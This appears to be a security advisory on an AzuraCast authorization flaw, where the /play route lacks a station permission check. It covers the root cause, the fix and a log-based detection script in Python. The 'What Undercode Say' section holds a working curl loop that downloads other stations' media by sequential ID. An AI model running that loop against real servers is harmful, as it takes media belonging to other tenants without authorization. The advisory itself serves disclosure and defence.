AzuraCast, Missing Authorization Check, CVE-unknown (critical)

How the mentioned CVE works:

The `GET /api/station/{station_id}/file/{id}/play` endpoint in AzuraCast lacks the `Middleware\Permissions` check that protects sibling routes such as `/file/{id}`. The vulnerable route group (lines 407-429 in api_station.php) defines four endpoints: GET, PUT and DELETE with the permission middleware, and GET `/play` without it. The middleware chain for `/play` consists of GetStation, RequireStation, RequireLogin and StationSupportsFeature(Media), but `RequireLogin` only verifies a valid session or API key; it enforces no station-level permissions. The controller (`PlayAction.php:84`) calls `$this->mediaRepo->requireForStation($id, $station)`, which checks that the media belongs to the station but performs no authorization check. The `findForStation` method (repository lines 46-66) accepts sequential integer IDs, so enumeration is trivial. This regression mirrors a previous fix (commit 7fbc7dd, 2026-02-26) that missed the `/play` route. An authenticated user with permissions only on Station A can therefore download any media from Station B by guessing sequential IDs, as shown in the PoC. The impact is a high-severity confidentiality breach: cross-station media exfiltration in multi-tenant deployments.

dailycve form:

Platform: AzuraCast
Version: Unpatched (pre-commit)
Vulnerability: Missing permissions check
Severity: Critical
Date: 2026-02-26

Prediction: 2026-03-05

What Undercode Say:

# Enumerate media files from unauthorized station (station_id=2)
for id in {1..100}; do
  curl -H "X-API-Key: $API_KEY" \
    "https://target/api/station/2/file/$id/play" \
    -o "stolen_$id.mp3" --fail --silent
done

# Verify permission check on protected endpoint
curl -H "X-API-Key: $API_KEY" \
  https://target/api/station/2/file/1
# Expected: 403 Forbidden

# Check if /play bypasses
curl -I -H "X-API-Key: $API_KEY" \
  https://target/api/station/2/file/1/play
# Returns 200 OK if vulnerable

Exploit:

The attacker needs any valid API key or session and requests `GET /api/station/{victim_station_id}/file/{sequential_id}/play` with it. No station permission is required. Media files are returned as binary content (MP3, FLAC, etc.). Enumeration uses the auto-increment integer IDs of the `StationMedia` table.

Protection from this CVE

Add `Middleware\Permissions(StationPermissions::Media, true)` to the `/play` route in api_station.php, lines 426-427. Example:

$group->get('/play', Controller\Api\Stations\Files\PlayAction::class)
    ->setName('api:stations:files:play')
    ->add(new Middleware\Permissions(StationPermissions::Media, true));

Alternatively, apply group-level middleware to the entire `/file/{id}` group.

Impact:

  • Confidentiality: High – full media file contents exposed.
  • Any authenticated user can exfiltrate any station's entire media library.
  • Multi-tenant hosting providers: cross-tenant data theft.
  • Trivial enumeration via sequential IDs. No privilege escalation needed beyond login.
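Detection logic for the enumeration pattern described in the PoC and the Impact list above, as an added example that is not part of this advisory or of AzuraCast: it parses constructed access-log lines (API-key prefix, method, path, status; this field layout is an assumption) and flags a key that walks near-sequential media IDs on `/play` for a station where the same key was already denied on the guarded `/file/{id}` route.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not from the page or from AzuraCast).
# Fields: api_key_prefix method path status
SAMPLE_LOG = """\
key_a1 GET /api/station/1/file/17/play 200
key_a1 GET /api/station/2/file/1 403
key_a1 GET /api/station/2/file/1/play 200
key_a1 GET /api/station/2/file/2/play 200
key_a1 GET /api/station/2/file/3/play 200
key_a1 GET /api/station/2/file/4/play 404
key_a1 GET /api/station/2/file/5/play 200
key_b2 GET /api/station/1/file/17/play 200
key_b2 GET /api/station/1/file/18/play 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3})$")
PLAY_RE = re.compile(r"^/api/station/(\d+)/file/(\d+)/play$")
FILE_RE = re.compile(r"^/api/station/(\d+)/file/(\d+)$")


def parse_requests(log):
    """Yield (api_key, station_id, media_id, is_play, status) for each
    request to /file/{id} or /file/{id}/play; other lines are skipped."""
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        key, _method, path, status = m.groups()
        for rx, is_play in ((PLAY_RE, True), (FILE_RE, False)):
            pm = rx.match(path)
            if pm:
                yield key, int(pm.group(1)), int(pm.group(2)), is_play, int(status)
                break


def find_enumeration(log, min_ids=4, max_gap=2):
    """Return one finding per (key, station) whose /play requests cover at
    least min_ids media IDs with no gap larger than max_gap. 'bypass' is True
    when the same key got a 403 on the guarded /file/{id} route for that
    station yet a 200 on /play, i.e. the missing-middleware signature."""
    play_ids = defaultdict(set)      # (key, station) -> media IDs hit via /play
    play_ok = defaultdict(bool)      # any 200 on /play
    file_denied = defaultdict(bool)  # any 403 on /file/{id}
    for key, station, media, is_play, status in parse_requests(log):
        k = (key, station)
        if is_play:
            play_ids[k].add(media)
            play_ok[k] |= status == 200
        elif status == 403:
            file_denied[k] = True
    findings = []
    for k, ids in play_ids.items():
        ordered = sorted(ids)
        gaps = [b - a for a, b in zip(ordered, ordered[1:])]
        if len(ordered) >= min_ids and all(g <= max_gap for g in gaps):
            findings.append({"api_key": k[0], "station": k[1], "ids": ordered,
                             "bypass": play_ok[k] and file_denied[k]})
    return findings
```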

Sources:

Reported By: github.com